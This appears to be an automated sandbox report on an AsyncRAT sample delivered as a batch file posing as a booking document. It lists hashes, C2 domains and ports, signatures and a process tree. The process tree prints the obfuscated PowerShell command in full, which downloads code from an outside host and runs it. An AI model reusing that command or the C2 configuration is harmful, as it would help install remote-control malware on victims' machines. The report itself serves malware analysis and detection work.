Analysis

  • max time kernel
    127s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-12-2022 12:26

General

  • Target

    Bloque de Reservas 2023.bat

  • Size

    21KB

  • MD5

    2a80fa747f0ea4e2c77d551a23d65285

  • SHA1

    f657495753dd91057279f8171eb031a26e57a5b0

  • SHA256

    3b42d41243205d02ba8d6ed32387207e340a29e7d4fc3b5c6451126b7a9c4f79

  • SHA512

    9f461b4d9afef6024dc456b04d882c8634932114e2ccb6611a4b99d21409da9a43d66adf4f19c0f294a1524e5c12f73cf5d51a45fc768311561815ebe46ebe67

  • SSDEEP

    384:Q9OXED0jw4MhT9OXED0jw4Mhc9OXED0jw4MhNG99OXED0jw4MhN6P:Q6+466+4j6+4sG6+4OY

Malware Config

Extracted

Family

asyncrat

Version

| Edit 3LOSH RAT

Botnet

AAAAAAAAAAAA+++AAAAAAAAAAAA

C2

chromedata.accesscam.org:7707

chromedata.accesscam.org:4404

chromedata.accesscam.org:5505

chromedata.accesscam.org:3303

chromedata.accesscam.org:2222

chromedata.accesscam.org:6606

chromedata.accesscam.org:8808

chromedata.accesscam.org:5155

chromedata.accesscam.org:5122

chromedata.accesscam.org:8001

chromedata.accesscam.org:9000

chromedata.accesscam.org:9999

chromedata.accesscam.org:8888

cdt.3utilities.com:7707

cdt.3utilities.com:4404

cdt.3utilities.com:5505

cdt.3utilities.com:3303

cdt.3utilities.com:2222

cdt.3utilities.com:6606

cdt.3utilities.com:8808

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_file

    DesbravadorUpdata.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Async RAT payload 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Bloque de Reservas 2023.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2576
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://account.booking.com/sign-in?op_token=EgVvYXV0aCJHChQ2Wjcyb0hPZDM2Tm43emszcGlyaBIJYXV0aG9yaXplGhpodHRwczovL2FkbWluLmJvb2tpbmcuY29tLyoCe31CBGNvZGUqEjCk3OzCvbMlOgBCAFjunbCQBg
      2⤵
      • Adds Run key to start application
      • Enumerates system info in registry
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:5112
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa99a046f8,0x7ffa99a04708,0x7ffa99a04718
        3⤵
          PID:1784
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,4990354261790979553,11845661885734761574,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
          3⤵
            PID:3080
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,4990354261790979553,11845661885734761574,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 /prefetch:3
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:3436
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,4990354261790979553,11845661885734761574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2676 /prefetch:8
            3⤵
              PID:4676
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4990354261790979553,11845661885734761574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:1
              3⤵
                PID:4728
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4990354261790979553,11845661885734761574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1
                3⤵
                  PID:4556
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2112,4990354261790979553,11845661885734761574,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5300 /prefetch:8
                  3⤵
                    PID:2436
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4990354261790979553,11845661885734761574,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:1
                    3⤵
                      PID:5032
                  • C:\Windows\system32\cmd.exe
                    CMD /C POWERSHELL -NOP -WIND HIDDEN -EXEC BYPASS -NONI $_xh_vs_m__yhm____j_w______e_o_rkal___am__n_jj_hezz___sq_loh__c_wdmh_bku__wrnfd__gayoqwwh__c____c__gvm_dpff___dw_f_c___g_pa___nhrz__x____wj_k_egqr__bc_ygbz_mx_iqxhsl_y______z_jkt____gpqq__x_o__b_n_luk_kk_a_egh_tsh_u_r____c_k_yl_h___yebd___z___hnvvkgnvyj_zqxa____yaxs__u_c_cc_z_fvgd____tr____c='IEX(NEW-OBJECT NET.W';$mn_c__j_bs_okzwhsze_e_y__fpeb____z__j___v__k____w_f_gm_____i_f_f__dk__x___w_x___xfh_qt_y_yy__e_qg_______mrq________txen_a____c_____yyne_lsd__fih__c_te_clog___f_f__lwncf_ijf_oxu_d__z_p____k__ri_s__o__yvw_k_n__ql__x___rk__arx_p_____gysg_______q__s_k_i__d_j_e__v_w__nf__re__ncz__yb_____n_dzki__='EBCLIENT).DOWNLO';SlEEp 1;[BYTE[]];SlEEp 1;$a_y_lnx_b__k__c___gk_s___hjw_czj_c_yr____w____c_l___a___j_cefb__f_______q_e__ves__k__cj_mc_x__g____eij_hp___t_im_j_______f___of_nzifzzlvu__dv__ltc__ax____qdcssboo_______d__py_k___k__q_kl_gj_____n_kp___qxwk__tmh_he_t_xbk___h_k___lzx___x_l_g_ds_c_______lgj_h_hmy_jjmjedhjd__u__x_f__n__dq__u___='ALLAH(''http://skynetx.com.br/cr.png'')'.RePLACe('ALLAH','ADSTRING');SlEEp 1;IEX($_xh_vs_m__yhm____j_w______e_o_rkal___am__n_jj_hezz___sq_loh__c_wdmh_bku__wrnfd__gayoqwwh__c____c__gvm_dpff___dw_f_c___g_pa___nhrz__x____wj_k_egqr__bc_ygbz_mx_iqxhsl_y______z_jkt____gpqq__x_o__b_n_luk_kk_a_egh_tsh_u_r____c_k_yl_h___yebd___z___hnvvkgnvyj_zqxa____yaxs__u_c_cc_z_fvgd____tr____c+$mn_c__j_bs_okzwhsze_e_y__fpeb____z__j___v__k____w_f_gm_____i_f_f__dk__x___w_x___xfh_qt_y_yy__e_qg_______mrq________txen_a____c_____yyne_lsd__fih__c_te_clog___f_f__lwncf_ijf_oxu_d__z_p____k__ri_s__o__yvw_k_n__ql__x___rk__arx_p_____gysg_______q__s_k_i__d_j_e__v_w__nf__re__ncz__yb_____n_dzki__+$a_y_lnx_b__k__c___gk_s___hjw_czj_c_yr____w____c_l___a___j_cefb__f_______q_e__ves__k__cj_mc_x__g____eij_hp___t_im_j_______f___of_nzifzzlvu__dv__ltc__ax____qdcssboo_______d__py_k___k__q_kl_gj_____n_kp___qxwk__tmh_he_t_xbk___h_k___lzx___x_l_g_ds_c_______lgj_h_hmy_jjmjedhjd__u__x_f__n__dq__u___)
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3968
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      POWERSHELL -NOP -WIND HIDDEN -EXEC BYPASS -NONI $_xh_vs_m__yhm____j_w______e_o_rkal___am__n_jj_hezz___sq_loh__c_wdmh_bku__wrnfd__gayoqwwh__c____c__gvm_dpff___dw_f_c___g_pa___nhrz__x____wj_k_egqr__bc_ygbz_mx_iqxhsl_y______z_jkt____gpqq__x_o__b_n_luk_kk_a_egh_tsh_u_r____c_k_yl_h___yebd___z___hnvvkgnvyj_zqxa____yaxs__u_c_cc_z_fvgd____tr____c='IEX(NEW-OBJECT NET.W';$mn_c__j_bs_okzwhsze_e_y__fpeb____z__j___v__k____w_f_gm_____i_f_f__dk__x___w_x___xfh_qt_y_yy__e_qg_______mrq________txen_a____c_____yyne_lsd__fih__c_te_clog___f_f__lwncf_ijf_oxu_d__z_p____k__ri_s__o__yvw_k_n__ql__x___rk__arx_p_____gysg_______q__s_k_i__d_j_e__v_w__nf__re__ncz__yb_____n_dzki__='EBCLIENT).DOWNLO';SlEEp 1;[BYTE[]];SlEEp 1;$a_y_lnx_b__k__c___gk_s___hjw_czj_c_yr____w____c_l___a___j_cefb__f_______q_e__ves__k__cj_mc_x__g____eij_hp___t_im_j_______f___of_nzifzzlvu__dv__ltc__ax____qdcssboo_______d__py_k___k__q_kl_gj_____n_kp___qxwk__tmh_he_t_xbk___h_k___lzx___x_l_g_ds_c_______lgj_h_hmy_jjmjedhjd__u__x_f__n__dq__u___='ALLAH(''http://skynetx.com.br/cr.png'')'.RePLACe('ALLAH','ADSTRING');SlEEp 1;IEX($_xh_vs_m__yhm____j_w______e_o_rkal___am__n_jj_hezz___sq_loh__c_wdmh_bku__wrnfd__gayoqwwh__c____c__gvm_dpff___dw_f_c___g_pa___nhrz__x____wj_k_egqr__bc_ygbz_mx_iqxhsl_y______z_jkt____gpqq__x_o__b_n_luk_kk_a_egh_tsh_u_r____c_k_yl_h___yebd___z___hnvvkgnvyj_zqxa____yaxs__u_c_cc_z_fvgd____tr____c+$mn_c__j_bs_okzwhsze_e_y__fpeb____z__j___v__k____w_f_gm_____i_f_f__dk__x___w_x___xfh_qt_y_yy__e_qg_______mrq________txen_a____c_____yyne_lsd__fih__c_te_clog___f_f__lwncf_ijf_oxu_d__z_p____k__ri_s__o__yvw_k_n__ql__x___rk__arx_p_____gysg_______q__s_k_i__d_j_e__v_w__nf__re__ncz__yb_____n_dzki__+$a_y_lnx_b__k__c___gk_s___hjw_czj_c_yr____w____c_l___a___j_cefb__f_______q_e__ves__k__cj_mc_x__g____eij_hp___t_im_j_______f___of_nzifzzlvu__dv__ltc__ax____qdcssboo_______d__py_k___k__q_kl_gj_____n_kp___qxwk__tmh_he_t_xbk___h_k___lzx___x_l_g_ds_c_______lgj_h_hmy_jjmjedhjd__u__x_f__n__dq__u___)
                      3⤵
                      • Blocklisted process makes network request
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2672
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        4⤵
                          PID:2436
                  • C:\Windows\System32\CompPkgSrv.exe
                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                    1⤵
                      PID:5108

                    Network

                    MITRE ATT&CK Matrix ATT&CK v6

                    Persistence

                    Registry Run Keys / Startup Folder

                    1
                    T1060

                    Defense Evasion

                    Modify Registry

                    1
                    T1112

                    Discovery

                    System Information Discovery

                    2
                    T1082

                    Query Registry

                    1
                    T1012

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • \??\pipe\LOCAL\crashpad_5112_OKWEWANOARZNYZKH
                      MD5

                      d41d8cd98f00b204e9800998ecf8427e

                      SHA1

                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                      SHA256

                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                      SHA512

                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                    • memory/1784-134-0x0000000000000000-mapping.dmp
                    • memory/2436-153-0x000000000040DD7E-mapping.dmp
                    • memory/2436-152-0x0000000000400000-0x0000000000412000-memory.dmp
                      Filesize

                      72KB

                    • memory/2436-149-0x0000000000000000-mapping.dmp
                    • memory/2672-136-0x0000022051530000-0x0000022051552000-memory.dmp
                      Filesize

                      136KB

                    • memory/2672-137-0x00007FFA97C20000-0x00007FFA986E1000-memory.dmp
                      Filesize

                      10.8MB

                    • memory/2672-135-0x0000000000000000-mapping.dmp
                    • memory/2672-154-0x00007FFA97C20000-0x00007FFA986E1000-memory.dmp
                      Filesize

                      10.8MB

                    • memory/3080-139-0x0000000000000000-mapping.dmp
                    • memory/3436-140-0x0000000000000000-mapping.dmp
                    • memory/3968-133-0x0000000000000000-mapping.dmp
                    • memory/4556-147-0x0000000000000000-mapping.dmp
                    • memory/4676-142-0x0000000000000000-mapping.dmp
                    • memory/4728-145-0x0000000000000000-mapping.dmp
                    • memory/5032-151-0x0000000000000000-mapping.dmp
                    • memory/5112-132-0x0000000000000000-mapping.dmp